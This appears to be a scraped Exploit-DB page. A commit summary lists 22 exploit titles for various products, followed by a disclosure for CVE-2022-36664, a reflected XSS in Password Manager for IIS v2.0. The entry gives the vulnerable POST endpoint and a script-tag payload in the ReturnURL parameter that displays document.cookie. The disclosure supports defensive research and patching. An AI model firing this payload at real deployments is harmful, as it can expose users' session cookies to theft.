
22 changes to exploits/shellcodes/ghdb Password Manager for IIS v2.0 - XSS DLink DIR 819 A1 - Denial of Service D-Link DNR-322L <=2.60B15 - Authenticated Remote Code Execution Abantecart v1.3.2 - Authenticated Remote Code Execution Bus Pass Management System 1.0 - Cross-Site Scripting (XSS) Composr-CMS Version <=10.0.39 - Authenticated Remote Code Execution Employee Performance Evaluation System v1.0 - File Inclusion and RCE GuppY CMS v6.00.10 - Remote Code Execution Human Resources Management System v1.0 - Multiple SQLi ImpressCMS v1.4.3 - Authenticated SQL Injection Lavalite v9.0.0 - XSRF-TOKEN cookie File path traversal MODX Revolution v2.8.3-pl - Authenticated Remote Code Execution NEX-Forms WordPress plugin < 7.9.7 - Authenticated SQLi Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated) PHPGurukul Online Birth Certificate System V 1.2 - Blind XSS SimpleMachinesForum v2.1.1 - Authenticated Remote Code Execution Translatepress Multilinugal WordPress plugin < 2.3.3 - Authenticated SQL Injection Yoga Class Registration System v1.0 - Multiple SQLi NVFLARE < 2.1.4 - Unsafe Deserialization due to Pickle _camp_ Raspberry Pi camera server 1.0 - Authentication Bypass System Mechanic v15.5.0.61 - Arbitrary Read/Write
17 lines
No EOL
492 B
Text
17 lines
No EOL
492 B
Text
# Exploit Title: Password Manager for IIS v2.0 - XSS
|
|
# Exploit Author: VP4TR10T
|
|
# Vendor Homepage: http://passwordmanager.adiscon.com/en/manual/
|
|
# Software Link: http://passwordmanager.adiscon.com/
|
|
<http://passwordmanager.adiscon.com/>
|
|
# Version: *Version 2.0
|
|
# Tested on: WINDOWS
|
|
# CVE : CVE-2022-36664
|
|
|
|
|
|
Affected URI (when changing user password):
|
|
POST /isapi/PasswordManager.dll HTTP/1.1
|
|
|
|
Affected Parameter in http
|
|
payload:*ReturnURL*=<script>alert(document.cookie)</script>
|
|
|
|
*Cordially,* |